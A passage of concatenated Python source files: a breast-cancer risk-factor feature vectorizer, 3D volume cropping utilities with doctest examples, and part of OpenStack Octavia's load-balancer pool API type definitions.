7: 'Unknown',
8: 'Hispanic',
9: 'Chinese',
10: 'Japanese',
11: 'Filipino',
12: 'Hawaiian',
13: 'Other Asian'
}
TREAT_MISSING_AS_NEGATIVE = False
NEGATIVE_99 = -99
class RiskFactorVectorizer():
def __init__(self, args):
self.risk_factor_metadata = parse_risk_factors(args)
self.risk_factor_transformers = \
{'binary_family_history': self.transform_binary_family_history,
'binary_biopsy_benign': self.get_binary_occurence_transformer(
'biopsy_hyperplasia', 'biopsy_hyperplasia_age'),
'binary_biopsy_LCIS': self.get_binary_occurence_transformer(
'biopsy_LCIS', 'biopsy_LCIS_age'),
'binary_biopsy_atypical_hyperplasia': self.get_binary_occurence_transformer(
'biopsy_atypical_hyperplasia', 'biopsy_atypical_hyperplasia_age'),
'age': self.get_exam_one_hot_risk_factor_transformer('age', [40, 50, 60, 70, 80]),
'menarche_age': self.get_age_based_risk_factor_transformer('menarche_age', [10, 12, 14, 16]),
'menopause_age': self.get_age_based_risk_factor_transformer('menopause_age', [45, 50, 55, 60]),
'first_pregnancy_age': self.get_age_based_risk_factor_transformer( 'first_pregnancy_age', [20, 25, 30, 35, 40]),
'density': self.get_image_biomarker_transformer('density'),
'bpe': self.get_image_biomarker_transformer('bpe'),
'5yearcancer': self.get_binary_transformer('5yearcancer'),
'prior_hist': self.get_binary_transformer('prior_hist'),
'years_to_cancer': self.get_exam_one_hot_risk_factor_transformer('years_to_cancer', [0, 1, 2, 3, 4, 10]),
'race': self.transform_race,
'parous': self.transform_parous,
'menopausal_status': self.transform_menopausal_status,
'weight': self.get_exam_one_hot_risk_factor_transformer('weight', [100, 130, 160, 190, 220, 250]),
'height': self.get_exam_one_hot_risk_factor_transformer('height', [50, 55, 60, 65, 70, 75]),
'ovarian_cancer': self.get_binary_occurence_transformer('ovarian_cancer',
'ovarian_cancer_age'),
'ovarian_cancer_age': self.get_age_based_risk_factor_transformer('ovarian_cancer_age',[30, 40, 50, 60, 70]),
'ashkenazi': self.get_binary_transformer('ashkenazi', use_patient_factors=True),
'brca': self.transform_brca,
'mom_bc_cancer_history': self.get_binary_relative_cancer_history_transformer('M'),
'm_aunt_bc_cancer_history': self.get_binary_relative_cancer_history_transformer('MA'),
'p_aunt_bc_cancer_history': self.get_binary_relative_cancer_history_transformer('PA'),
'm_grandmother_bc_cancer_history': self.get_binary_relative_cancer_history_transformer('MG'),
'p_grantmother_bc_cancer_history': self.get_binary_relative_cancer_history_transformer('PG'),
'brother_bc_cancer_history': self.get_binary_relative_cancer_history_transformer('B'),
'father_bc_cancer_history': self.get_binary_relative_cancer_history_transformer('F'),
'daughter_bc_cancer_history': self.get_binary_relative_cancer_history_transformer('D'),
'sister_bc_cancer_history': self.get_binary_relative_cancer_history_transformer('S'),
'mom_oc_cancer_history': self.get_binary_relative_cancer_history_transformer('M', cancer='ovarian_cancer'),
'm_aunt_oc_cancer_history': self.get_binary_relative_cancer_history_transformer('MA', cancer='ovarian_cancer'),
'p_aunt_oc_cancer_history': self.get_binary_relative_cancer_history_transformer('PA', cancer='ovarian_cancer'),
'm_grandmother_oc_cancer_history': self.get_binary_relative_cancer_history_transformer('MG', cancer='ovarian_cancer'),
'p_grantmother_oc_cancer_history': self.get_binary_relative_cancer_history_transformer('PG', cancer='ovarian_cancer'),
'sister_oc_cancer_history': self.get_binary_relative_cancer_history_transformer('S', cancer='ovarian_cancer'),
'daughter_oc_cancer_history': self.get_binary_relative_cancer_history_transformer('D', cancer='ovarian_cancer'),
'hrt_type': self.get_hrt_information_transformer('type'),
'hrt_duration': self.get_hrt_information_transformer('duration'),
'hrt_years_ago_stopped': self.get_hrt_information_transformer('years_ago_stopped')
}
self.risk_factor_keys = args.risk_factor_keys
self.feature_names = []
self.risk_factor_key_to_num_class = {}
for k in self.risk_factor_keys:
if k not in self.risk_factor_transformers.keys():
raise Exception("Risk factor key '{}' not supported.".format(k))
names = self.risk_factor_transformers[k](None, None, just_return_feature_names=True)
self.risk_factor_key_to_num_class[k] = len(names)
self.feature_names.extend(names)
args.risk_factor_key_to_num_class = self.risk_factor_key_to_num_class
@property
def vector_length(self):
return len(self.feature_names)
def get_feature_names(self):
return copy.deepcopy(self.feature_names)
def one_hot_vectorizor(self, value, cutoffs):
one_hot_vector = torch.zeros(len(cutoffs) + 1)
if value == MISSING_VALUE:
return one_hot_vector
for i, cutoff in enumerate(cutoffs):
if value <= cutoff:
one_hot_vector[i] = 1
return one_hot_vector
one_hot_vector[-1] = 1
return one_hot_vector
def one_hot_feature_names(self, risk_factor_name, cutoffs):
feature_names = [""] * (len(cutoffs) + 1)
feature_names[0] = "{}_lt_{}".format(risk_factor_name, cutoffs[0])
feature_names[-1] = "{}_gt_{}".format(risk_factor_name, cutoffs[-1])
for i in range(1, len(cutoffs)):
feature_names[i] = "{}_{}_{}".format(risk_factor_name, cutoffs[i - 1], cutoffs[i])
return feature_names
def get_age_based_risk_factor_transformer(self, risk_factor_key, age_cutoffs):
def transform_age_based_risk_factor(patient_factors, exam_factors, just_return_feature_names=False):
if just_return_feature_names:
return self.one_hot_feature_names(risk_factor_key, age_cutoffs)
# if age-based risk factor, like menopause_age or first_pregnancy_age, is after the age at the exam, then treat it like it has not happened yet.
exam_age = int(exam_factors['age'])
age_based_risk_factor = int(patient_factors[risk_factor_key])
if exam_age != MISSING_VALUE and exam_age < age_based_risk_factor:
age_based_risk_factor = MISSING_VALUE # effectively same as missing
return self.one_hot_vectorizor(age_based_risk_factor, age_cutoffs)
return transform_age_based_risk_factor
def get_exam_one_hot_risk_factor_transformer(self, risk_factor_key, cutoffs):
def transform_exam_one_hot_risk_factor(patient_factors, exam_factors, just_return_feature_names=False):
if just_return_feature_names:
return self.one_hot_feature_names(risk_factor_key, cutoffs)
risk_factor = int(exam_factors[risk_factor_key])
return self.one_hot_vectorizor(risk_factor, cutoffs)
return transform_exam_one_hot_risk_factor
def get_binary_occurence_transformer(self, occurence_key, occurence_age_key):
def transform_binary_occurence(patient_factors, exam_factors, just_return_feature_names=False):
if just_return_feature_names:
return ['binary_{}'.format(occurence_key)]
binary_occurence = torch.zeros(1)
occurence = int(patient_factors[occurence_key])
occurence_age = int(patient_factors[occurence_age_key])
exam_age = int(exam_factors['age'])
if occurence and (occurence_age == MISSING_VALUE or exam_age >= occurence_age):
binary_occurence[0] = 1
return binary_occurence
return transform_binary_occurence
def get_binary_transformer(self, risk_factor_key, use_patient_factors=False):
def transform_binary(patient_factors, exam_factors, just_return_feature_names=False):
if just_return_feature_names:
return ['binary_{}'.format(risk_factor_key)]
binary_risk_factor = torch.zeros(1)
risk_factor = int(patient_factors[risk_factor_key]) if use_patient_factors else int(
exam_factors[risk_factor_key])
# If a binary risk factor is -1, we also want to treat it as negative (0)
binary_risk_factor[0] = 1 if risk_factor == 1 else 0
return binary_risk_factor
return transform_binary
def get_binary_relative_cancer_history_transformer(self, relative_code, cancer='breast_cancer'):
def transform_binary_relative_cancer_history(patient_factors, exam_factors, just_return_feature_names=False):
if just_return_feature_names:
return ['{}_{}_hist'.format(relative_code, cancer)]
binary_relative_cancer_history = torch.zeros(1)
relative_list = patient_factors['relatives'][relative_code]
for rel in relative_list:
if rel[cancer] == 1:
binary_relative_cancer_history[0] = 1
return binary_relative_cancer_history
return transform_binary_relative_cancer_history
def get_image_biomarker_transformer(self, name):
def image_biomarker_transformer(patient_factors, exam_factors, just_return_feature_names=False):
if just_return_feature_names:
return (["{}_{}".format(name, i) for i in range(1,5)])
image_biomarker_vector = torch.zeros(4)
image_biomarker = int(exam_factors[name])
if image_biomarker != MISSING_VALUE:
image_biomarker_vector[image_biomarker - 1] = 1
return image_biomarker_vector
return image_biomarker_transformer
def transform_binary_family_history(self, patient_factors, exam_factors, just_return_feature_names=False):
if just_return_feature_names:
return (['binary_family_history'])
relatives_dict = patient_factors['relatives']
binary_family_history = torch.zeros(1)
for relative, relative_list in relatives_dict.items():
if len(relative_list) > 0:
binary_family_history[0] = 1
return binary_family_history
def transform_parous(self, patient_factors, exam_factors, just_return_feature_names=False):
if just_return_feature_names:
return (['parous'])
binary_parous = torch.zeros(1)
exam_age = int(exam_factors['age'])
binary_parous[0] = 1 if patient_factors['num_births'] != MISSING_VALUE else 0
if patient_factors['first_pregnancy_age'] != MISSING_VALUE:
binary_parous[0] = 1 if patient_factors['first_pregnancy_age'] < exam_age else 0
return binary_parous
def transform_race(self, patient_factors, exam_factors, just_return_feature_names=False):
values = range(1, 14)
race_vector = torch.zeros(len(values))
if just_return_feature_names:
return [RACE_CODE_TO_NAME[i] for i in values]
race = int(patient_factors['race'])
race_vector[race - 1] = 1
return race_vector
def transform_menopausal_status(self, patient_factors, exam_factors, just_return_feature_names=False):
if just_return_feature_names:
return ['pre', 'peri', 'post', 'unknown']
exam_age = int(exam_factors['age'])
menopausal_status = 3 # unknown
age_at_menopause = patient_factors['menopause_age'] \
if patient_factors['menopause_age'] != MISSING_VALUE else NEGATIVE_99
if age_at_menopause != NEGATIVE_99:
if age_at_menopause < exam_age:
menopausal_status = 2
elif age_at_menopause == exam_age:
menopausal_status = 1
elif age_at_menopause > exam_age:
menopausal_status = 0
else:
if TREAT_MISSING_AS_NEGATIVE:
menopausal_status = 0
menopausal_status_vector = torch.zeros(4)
menopausal_status_vector[menopausal_status] = 1
return menopausal_status_vector
def transform_brca(self, patient_factors, exam_factors, just_return_feature_names=False):
if just_return_feature_names:
return ['never or unknown', 'negative result', 'brca1', 'brca2']
genetic_testing_patient = 0
brca1 = patient_factors['brca1']
brca2 = patient_factors['brca2']
if brca2 == 1:
genetic_testing_patient = 3
elif brca1 == 1:
genetic_testing_patient = 2
elif brca1 == 0:
genetic_testing_patient = 1
genetic_testing_vector = torch.zeros(4)
genetic_testing_vector[genetic_testing_patient] = 1
return genetic_testing_vector
def get_hrt_information_transformer(self, piece):
def transform_hrt_information(patient_factors, exam_factors, just_return_feature_names=False):
year_cutoffs = [1,3,5,7]
piece_to_feature_names = {'type': ['hrt_combined', 'hrt_estrogen', 'hrt_unknown'],
'duration': self.one_hot_feature_names('hrt_duration', year_cutoffs),
'years_ago_stopped': self.one_hot_feature_names('hrt_years_ago_stopped', year_cutoffs)}
assert piece in piece_to_feature_names.keys()
if just_return_feature_names:
return piece_to_feature_names[piece]
hrt_vector = torch.zeros(3)
duration = MISSING_VALUE
hrt_type = MISSING_VALUE
hrt_years_ago_stopped = MISSING_VALUE
first_age_key = None
last_age_key = None
duration_key = None
current_age = int(exam_factors['age'])
if patient_factors['combined_hrt']:
hrt_type = 0
first_age_key = 'combined_hrt_first_age'
last_age_key = 'combined_hrt_last_age'
duration_key = 'combined_hrt_duration'
elif patient_factors['estrogen_hrt']:
hrt_type = 1
first_age_key = 'estrogen_hrt_first_age'
last_age_key = 'estrogen_hrt_last_age'
duration_key = 'estrogen_hrt_duration'
elif patient_factors['unknown_hrt']:
hrt_type = 2
first_age_key = 'unknown_hrt_first_age'
last_age_key = 'unknown_hrt_last_age'
duration_key = 'unknown_hrt_duration'
if first_age_key:
first_age = patient_factors[first_age_key]
last_age = patient_factors[last_age_key]
extracted_duration = patient_factors[duration_key]
if last_age >= current_age and current_age != MISSING_VALUE:
if first_age != MISSING_VALUE and first_age > current_age:
# future_user
hrt_type = MISSING_VALUE
elif extracted_duration != MISSING_VALUE and last_age - extracted_duration > current_age:
# future_user
hrt_type = MISSING_VALUE
else:
duration = current_age - first_age if current_age != MISSING_VALUE and first_age != MISSING_VALUE else extracted_duration
elif last_age != MISSING_VALUE:
hrt_years_ago_stopped = current_age - last_age
if extracted_duration != MISSING_VALUE:
duration = extracted_duration
elif first_age != MISSING_VALUE and last_age != MISSING_VALUE:
duration = last_age - first_age
assert duration >= 0
else:
duration = extracted_duration if extracted_duration != MISSING_VALUE else MISSING_VALUE
if hrt_type > MISSING_VALUE:
hrt_vector[hrt_type] = 1
piece_to_feature_names = {'type': hrt_vector,
'duration': self.one_hot_vectorizor(duration, year_cutoffs),
'years_ago_stopped': self.one_hot_vectorizor(hrt_years_ago_stopped, year_cutoffs)}
return piece_to_feature_names[piece]
return transform_hrt_information
def transform_5yearcancer(self, patient_factors, exam_factors, just_return_feature_names=False):
if just_return_feature_names:
return (['5yearcancer'])
binary_5yearcancer = torch.zeros(1)
binary_5yearcancer[0] = int(exam_factors['5yearcancer'])
return binary_5yearcancer
def transform(self, patient_factors, exam_factors):
risk_factor_vecs = [self.risk_factor_transformers[key](patient_factors, exam_factors) for key in
self.risk_factor_keys]
return risk_factor_vecs
def get_risk_factors_for_sample(self, sample):
sample_patient_factors = self.risk_factor_metadata[sample['ssn']]
sample_exam_factors = self.risk_factor_metadata[sample['ssn']]['accessions'][sample['exam']]
risk_factor_vector = self.transform(sample_patient_factors, sample_exam_factors)
return risk_factor_vector
def get_buckets_for_sample(self, sample):
sample_patient_factors = self.risk_factor_metadata[sample['ssn']]
sample_exam_factors = self.risk_factor_metadata[sample['ssn']]['accessions'][sample['exam']]
buckets = {}
for key in self.risk_factor_keys:
names = self.risk_factor_transformers[key](None, None, just_return_feature_names=True)
vectorized = self.risk_factor_transformers[key](sample_patient_factors, sample_exam_factors)
if sum(vectorized) == 0:
buckets[key] = 'missing_or_negative'
else:
name_index = int(vectorized.dot(torch.arange(len(vectorized))))
buckets[key] = names[name_index]
return buckets
return self.transform(sample_patient_factors, sample_exam_factors)
def parse_risk_factors(args):
'''
Parse the risk factors json file and return a dict mapping ssns to patient dictionaries. Each patient dictionary
contains patient-level risk factors (e.g. race), as well as an 'accessions' key, that maps to a dictionary
mapping accesion#s to dictionaries containing exam-level risk factors (e.g. age).
'''
try:
metadata_json = json.load(open(args.metadata_path, 'r'))
except Exception as e:
raise Exception("Not found {} {}".format(args.metadata_path, e))
try:
risk_factor_metadata = json.load(open(args.risk_factor_metadata_path, 'r'))
except Exception as e:
raise Exception(
"Metadata file {} could not be parsed! Exception: {}!".format(args.risk_factor_metadata_path, e))
if '5yearcancer' in args.risk_factor_keys:
for patient in metadata_json:
ssn = patient['ssn']
for exam in patient['accessions']:
acc = exam['accession']
label = 1 if exam['label'] == 'POS' else 0
risk_factor_metadata[ssn]['accessions'][acc]['5yearcancer'] = label
if 'prior_hist' in args.risk_factor_keys:
for patient in metadata_json:
if 'nwh' in args.dataset:
ssn = patient['mrn']
risk_factor_metadata[ssn]['accessions'][ssn]['prior_hist'] = 0
else:
ssn = patient['ssn']
for exam in patient['accessions']:
acc = exam['accession']
risk_factor_metadata[ssn]['accessions'][acc]['prior_hist'] = exam['prior_hist']
if 'years_to_cancer' in args.risk_factor_keys:
for patient in metadata_json:
ssn = patient['ssn']
for exam in patient['accessions']:
acc = exam['accession']
risk_factor_metadata[ssn]['accessions'][acc]['years_to_cancer'] = exam['years_to_cancer']
if 'bpe' in args.risk_factor_keys:
for patient in metadata_json:
ssn = patient['ssn']
for exam in patient['accessions']:
acc = exam['accession']
risk_factor_metadata[ssn]['accessions'][acc]['bpe'] = exam['bpe'] if 'bpe' in exam else MISSING_VALUE
return risk_factor_metadata
|
the-stack_0_6449 | from typing import Tuple
import torch
from kornia.geometry.bbox import infer_bbox_shape3d, validate_bbox3d
from .projwarp import get_perspective_transform3d, warp_affine3d
__all__ = [
"crop_and_resize3d",
"crop_by_boxes3d",
"crop_by_transform_mat3d",
"center_crop3d",
]
def crop_and_resize3d(
tensor: torch.Tensor,
boxes: torch.Tensor,
size: Tuple[int, int, int],
interpolation: str = 'bilinear',
align_corners: bool = False,
) -> torch.Tensor:
r"""Extract crops from 3D volumes (5D tensor) and resize them.
Args:
tensor: the 3D volume tensor with shape (B, C, D, H, W).
boxes: a tensor with shape (B, 8, 3) containing the coordinates of the bounding boxes
to be extracted. The tensor must have the shape of Bx8x3, where each box is defined in the clockwise
order: front-top-left, front-top-right, front-bottom-right, front-bottom-left, back-top-left,
back-top-right, back-bottom-right, back-bottom-left. The coordinates must be in x, y, z order.
size: a tuple with the height and width that will be
used to resize the extracted patches.
interpolation: Interpolation flag.
align_corners: mode for grid_generation.
Returns:
tensor containing the patches with shape (Bx)CxN1xN2xN3.
Example:
>>> input = torch.arange(64, dtype=torch.float32).view(1, 1, 4, 4, 4)
>>> input
tensor([[[[[ 0., 1., 2., 3.],
[ 4., 5., 6., 7.],
[ 8., 9., 10., 11.],
[12., 13., 14., 15.]],
<BLANKLINE>
[[16., 17., 18., 19.],
[20., 21., 22., 23.],
[24., 25., 26., 27.],
[28., 29., 30., 31.]],
<BLANKLINE>
[[32., 33., 34., 35.],
[36., 37., 38., 39.],
[40., 41., 42., 43.],
[44., 45., 46., 47.]],
<BLANKLINE>
[[48., 49., 50., 51.],
[52., 53., 54., 55.],
[56., 57., 58., 59.],
[60., 61., 62., 63.]]]]])
>>> boxes = torch.tensor([[
... [1., 1., 1.],
... [3., 1., 1.],
... [3., 3., 1.],
... [1., 3., 1.],
... [1., 1., 2.],
... [3., 1., 2.],
... [3., 3., 2.],
... [1., 3., 2.],
... ]]) # 1x8x3
>>> crop_and_resize3d(input, boxes, (2, 2, 2), align_corners=True)
tensor([[[[[21.0000, 23.0000],
[29.0000, 31.0000]],
<BLANKLINE>
[[37.0000, 39.0000],
[45.0000, 47.0000]]]]])
"""
if not isinstance(tensor, (torch.Tensor)):
raise TypeError(f"Input tensor type is not a torch.Tensor. Got {type(tensor)}")
if not isinstance(boxes, (torch.Tensor)):
raise TypeError(f"Input boxes type is not a torch.Tensor. Got {type(boxes)}")
if not isinstance(size, (tuple, list)) and len(size) != 3:
raise ValueError(f"Input size must be a tuple/list of length 3. Got {size}")
if len(tensor.shape) != 5:
raise AssertionError(f"Only tensor with shape (B, C, D, H, W) supported. Got {tensor.shape}.")
# unpack input data
dst_d, dst_h, dst_w = size[0], size[1], size[2]
# [x, y, z] origin
# from front to back
# top-left, top-right, bottom-right, bottom-left
points_src: torch.Tensor = boxes
# [x, y, z] destination
# from front to back
# top-left, top-right, bottom-right, bottom-left
points_dst: torch.Tensor = torch.tensor(
[
[
[0, 0, 0],
[dst_w - 1, 0, 0],
[dst_w - 1, dst_h - 1, 0],
[0, dst_h - 1, 0],
[0, 0, dst_d - 1],
[dst_w - 1, 0, dst_d - 1],
[dst_w - 1, dst_h - 1, dst_d - 1],
[0, dst_h - 1, dst_d - 1],
]
],
dtype=tensor.dtype,
device=tensor.device,
).expand(points_src.shape[0], -1, -1)
return crop_by_boxes3d(tensor, points_src, points_dst, interpolation, align_corners)
def center_crop3d(
tensor: torch.Tensor, size: Tuple[int, int, int], interpolation: str = 'bilinear', align_corners: bool = True
) -> torch.Tensor:
r"""Crop the 3D volumes (5D tensor) at the center.
Args:
tensor: the 3D volume tensor with shape (B, C, D, H, W).
size: a tuple with the expected depth, height and width
of the output patch.
interpolation: Interpolation flag.
align_corners : mode for grid_generation.
Returns:
the output tensor with patches.
Examples:
>>> input = torch.arange(64, dtype=torch.float32).view(1, 1, 4, 4, 4)
>>> input
tensor([[[[[ 0., 1., 2., 3.],
[ 4., 5., 6., 7.],
[ 8., 9., 10., 11.],
[12., 13., 14., 15.]],
<BLANKLINE>
[[16., 17., 18., 19.],
[20., 21., 22., 23.],
[24., 25., 26., 27.],
[28., 29., 30., 31.]],
<BLANKLINE>
[[32., 33., 34., 35.],
[36., 37., 38., 39.],
[40., 41., 42., 43.],
[44., 45., 46., 47.]],
<BLANKLINE>
[[48., 49., 50., 51.],
[52., 53., 54., 55.],
[56., 57., 58., 59.],
[60., 61., 62., 63.]]]]])
>>> center_crop3d(input, (2, 2, 2), align_corners=True)
tensor([[[[[21.0000, 22.0000],
[25.0000, 26.0000]],
<BLANKLINE>
[[37.0000, 38.0000],
[41.0000, 42.0000]]]]])
"""
if not isinstance(tensor, (torch.Tensor)):
raise TypeError(f"Input tensor type is not a torch.Tensor. Got {type(tensor)}")
if len(tensor.shape) != 5:
raise AssertionError(f"Only tensor with shape (B, C, D, H, W) supported. Got {tensor.shape}.")
if not isinstance(size, (tuple, list)) and len(size) == 3:
raise ValueError(f"Input size must be a tuple/list of length 3. Got {size}")
# unpack input sizes
dst_d, dst_h, dst_w = size
src_d, src_h, src_w = tensor.shape[-3:]
# compute start/end offsets
dst_d_half = dst_d / 2
dst_h_half = dst_h / 2
dst_w_half = dst_w / 2
src_d_half = src_d / 2
src_h_half = src_h / 2
src_w_half = src_w / 2
start_x = src_w_half - dst_w_half
start_y = src_h_half - dst_h_half
start_z = src_d_half - dst_d_half
end_x = start_x + dst_w - 1
end_y = start_y + dst_h - 1
end_z = start_z + dst_d - 1
# [x, y, z] origin
# top-left-front, top-right-front, bottom-right-front, bottom-left-front
# top-left-back, top-right-back, bottom-right-back, bottom-left-back
points_src: torch.Tensor = torch.tensor(
[
[
[start_x, start_y, start_z],
[end_x, start_y, start_z],
[end_x, end_y, start_z],
[start_x, end_y, start_z],
[start_x, start_y, end_z],
[end_x, start_y, end_z],
[end_x, end_y, end_z],
[start_x, end_y, end_z],
]
],
device=tensor.device,
)
# [x, y, z] destination
# top-left-front, top-right-front, bottom-right-front, bottom-left-front
# top-left-back, top-right-back, bottom-right-back, bottom-left-back
points_dst: torch.Tensor = torch.tensor(
[
[
[0, 0, 0],
[dst_w - 1, 0, 0],
[dst_w - 1, dst_h - 1, 0],
[0, dst_h - 1, 0],
[0, 0, dst_d - 1],
[dst_w - 1, 0, dst_d - 1],
[dst_w - 1, dst_h - 1, dst_d - 1],
[0, dst_h - 1, dst_d - 1],
]
],
device=tensor.device,
).expand(points_src.shape[0], -1, -1)
return crop_by_boxes3d(
tensor, points_src.to(tensor.dtype), points_dst.to(tensor.dtype), interpolation, align_corners
)
def crop_by_boxes3d(
tensor: torch.Tensor,
src_box: torch.Tensor,
dst_box: torch.Tensor,
interpolation: str = 'bilinear',
align_corners: bool = False,
) -> torch.Tensor:
"""Perform crop transform on 3D volumes (5D tensor) by bounding boxes.
Given an input tensor, this function selected the interested areas by the provided bounding boxes (src_box).
Then the selected areas would be fitted into the targeted bounding boxes (dst_box) by a perspective transformation.
So far, the ragged tensor is not supported by PyTorch right now. This function hereby requires the bounding boxes
in a batch must be rectangles with same width, height and depth.
Args:
tensor : the 3D volume tensor with shape (B, C, D, H, W).
src_box : a tensor with shape (B, 8, 3) containing the coordinates of the bounding boxes
to be extracted. The tensor must have the shape of Bx8x3, where each box is defined in the clockwise
order: front-top-left, front-top-right, front-bottom-right, front-bottom-left, back-top-left,
back-top-right, back-bottom-right, back-bottom-left. The coordinates must be in x, y, z order.
dst_box: a tensor with shape (B, 8, 3) containing the coordinates of the bounding boxes
to be placed. The tensor must have the shape of Bx8x3, where each box is defined in the clockwise
order: front-top-left, front-top-right, front-bottom-right, front-bottom-left, back-top-left,
back-top-right, back-bottom-right, back-bottom-left. The coordinates must be in x, y, z order.
interpolation: Interpolation flag.
align_corners: mode for grid_generation.
Returns:
the output tensor with patches.
Examples:
>>> input = torch.tensor([[[
... [[ 0., 1., 2., 3.],
... [ 4., 5., 6., 7.],
... [ 8., 9., 10., 11.],
... [12., 13., 14., 15.]],
... [[16., 17., 18., 19.],
... [20., 21., 22., 23.],
... [24., 25., 26., 27.],
... [28., 29., 30., 31.]],
... [[32., 33., 34., 35.],
... [36., 37., 38., 39.],
... [40., 41., 42., 43.],
... [44., 45., 46., 47.]]]]])
>>> src_box = torch.tensor([[
... [1., 1., 1.],
... [3., 1., 1.],
... [3., 3., 1.],
... [1., 3., 1.],
... [1., 1., 2.],
... [3., 1., 2.],
... [3., 3., 2.],
... [1., 3., 2.],
... ]]) # 1x8x3
>>> dst_box = torch.tensor([[
... [0., 0., 0.],
... [2., 0., 0.],
... [2., 2., 0.],
... [0., 2., 0.],
... [0., 0., 1.],
... [2., 0., 1.],
... [2., 2., 1.],
... [0., 2., 1.],
... ]]) # 1x8x3
>>> crop_by_boxes3d(input, src_box, dst_box, interpolation='nearest', align_corners=True)
tensor([[[[[21., 22., 23.],
[25., 26., 27.],
[29., 30., 31.]],
<BLANKLINE>
[[37., 38., 39.],
[41., 42., 43.],
[45., 46., 47.]]]]])
"""
validate_bbox3d(src_box)
validate_bbox3d(dst_box)
if len(tensor.shape) != 5:
raise AssertionError(f"Only tensor with shape (B, C, D, H, W) supported. Got {tensor.shape}.")
# compute transformation between points and warp
# Note: Tensor.dtype must be float. "solve_cpu" not implemented for 'Long'
dst_trans_src: torch.Tensor = get_perspective_transform3d(src_box.to(tensor.dtype), dst_box.to(tensor.dtype))
# simulate broadcasting
dst_trans_src = dst_trans_src.expand(tensor.shape[0], -1, -1).type_as(tensor)
bbox = infer_bbox_shape3d(dst_box)
if not ((bbox[0] == bbox[0][0]).all() and (bbox[1] == bbox[1][0]).all() and (bbox[2] == bbox[2][0]).all()):
raise AssertionError(
"Cropping height, width and depth must be exact same in a batch."
f"Got height {bbox[0]}, width {bbox[1]} and depth {bbox[2]}."
)
patches: torch.Tensor = crop_by_transform_mat3d(
tensor,
dst_trans_src,
(int(bbox[0][0].item()), int(bbox[1][0].item()), int(bbox[2][0].item())),
mode=interpolation,
align_corners=align_corners,
)
return patches
def crop_by_transform_mat3d(
tensor: torch.Tensor,
transform: torch.Tensor,
out_size: Tuple[int, int, int],
mode: str = 'bilinear',
padding_mode: str = 'zeros',
align_corners: bool = True,
) -> torch.Tensor:
"""Perform crop transform on 3D volumes (5D tensor) given a perspective transformation matrix.
Args:
tensor: the 2D image tensor with shape (B, C, H, W).
transform: a perspective transformation matrix with shape (B, 4, 4).
out_size: size of the output image (depth, height, width).
mode: interpolation mode to calculate output values
``'bilinear'`` | ``'nearest'``.
padding_mode: padding mode for outside grid values
``'zeros'`` | ``'border'`` | ``'reflection'``.
align_corners: mode for grid_generation.
Returns:
the output tensor with patches.
"""
# simulate broadcasting
dst_trans_src = transform.expand(tensor.shape[0], -1, -1)
patches: torch.Tensor = warp_affine3d(
tensor, dst_trans_src[:, :3, :], out_size, flags=mode, padding_mode=padding_mode, align_corners=align_corners
)
return patches
|
the-stack_0_6451 | # Copyright 2014 Rackspace
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from octavia_lib.common import constants as lib_constants
from wsme import types as wtypes
from octavia.api.common import types
from octavia.api.v2.types import health_monitor
from octavia.api.v2.types import member
from octavia.common import constants
class SessionPersistenceResponse(types.BaseType):
"""Defines which attributes are to be shown on any response."""
type = wtypes.wsattr(wtypes.text)
cookie_name = wtypes.wsattr(wtypes.text)
persistence_timeout = wtypes.wsattr(wtypes.IntegerType())
persistence_granularity = wtypes.wsattr(types.IPAddressType())
class SessionPersistencePOST(types.BaseType):
"""Defines mandatory and optional attributes of a POST request."""
type = wtypes.wsattr(wtypes.Enum(str, *constants.SUPPORTED_SP_TYPES),
mandatory=True)
cookie_name = wtypes.wsattr(wtypes.StringType(max_length=255),
default=None)
persistence_timeout = wtypes.wsattr(wtypes.IntegerType(), default=None)
persistence_granularity = wtypes.wsattr(types.IPAddressType(),
default=None)
class SessionPersistencePUT(types.BaseType):
"""Defines attributes that are acceptable of a PUT request."""
type = wtypes.wsattr(wtypes.Enum(str, *constants.SUPPORTED_SP_TYPES))
cookie_name = wtypes.wsattr(wtypes.StringType(max_length=255),
default=None)
persistence_timeout = wtypes.wsattr(wtypes.IntegerType(), default=None)
persistence_granularity = wtypes.wsattr(types.IPAddressType(),
default=None)
class BasePoolType(types.BaseType):
_type_to_model_map = {'admin_state_up': 'enabled',
'healthmonitor': 'health_monitor',
'healthmonitor_id': 'health_monitor.id',
'tls_container_ref': 'tls_certificate_id',
'ca_tls_container_ref': 'ca_tls_certificate_id',
'crl_container_ref': 'crl_container_id'}
_child_map = {'health_monitor': {'id': 'healthmonitor_id'}}
class PoolResponse(BasePoolType):
"""Defines which attributes are to be shown on any response."""
id = wtypes.wsattr(wtypes.UuidType())
name = wtypes.wsattr(wtypes.StringType())
description = wtypes.wsattr(wtypes.StringType())
provisioning_status = wtypes.wsattr(wtypes.StringType())
operating_status = wtypes.wsattr(wtypes.StringType())
admin_state_up = wtypes.wsattr(bool)
protocol = wtypes.wsattr(wtypes.text)
lb_algorithm = wtypes.wsattr(wtypes.text)
session_persistence = wtypes.wsattr(SessionPersistenceResponse)
project_id = wtypes.wsattr(wtypes.StringType())
loadbalancers = wtypes.wsattr([types.IdOnlyType])
listeners = wtypes.wsattr([types.IdOnlyType])
created_at = wtypes.wsattr(wtypes.datetime.datetime)
updated_at = wtypes.wsattr(wtypes.datetime.datetime)
healthmonitor_id = wtypes.wsattr(wtypes.UuidType())
members = wtypes.wsattr([types.IdOnlyType])
tags = wtypes.wsattr(wtypes.ArrayType(wtypes.StringType()))
tls_container_ref = wtypes.wsattr(wtypes.StringType())
ca_tls_container_ref = wtypes.wsattr(wtypes.StringType())
crl_container_ref = wtypes.wsattr(wtypes.StringType())
tls_enabled = wtypes.wsattr(bool)
tls_ciphers = wtypes.wsattr(wtypes.StringType())
tls_versions = wtypes.wsattr(wtypes.ArrayType(wtypes.StringType()))
@classmethod
def from_data_model(cls, data_model, children=False):
pool = super(PoolResponse, cls).from_data_model(
data_model, children=children)
if data_model.session_persistence:
pool.session_persistence = (
SessionPersistenceResponse.from_data_model(
data_model.session_persistence))
if cls._full_response():
del pool.loadbalancers
member_model = member.MemberFullResponse
if pool.healthmonitor:
pool.healthmonitor = (
health_monitor.HealthMonitorFullResponse
.from_data_model(data_model.health_monitor))
else:
if data_model.load_balancer:
pool.loadbalancers = [
types.IdOnlyType.from_data_model(data_model.load_balancer)]
else:
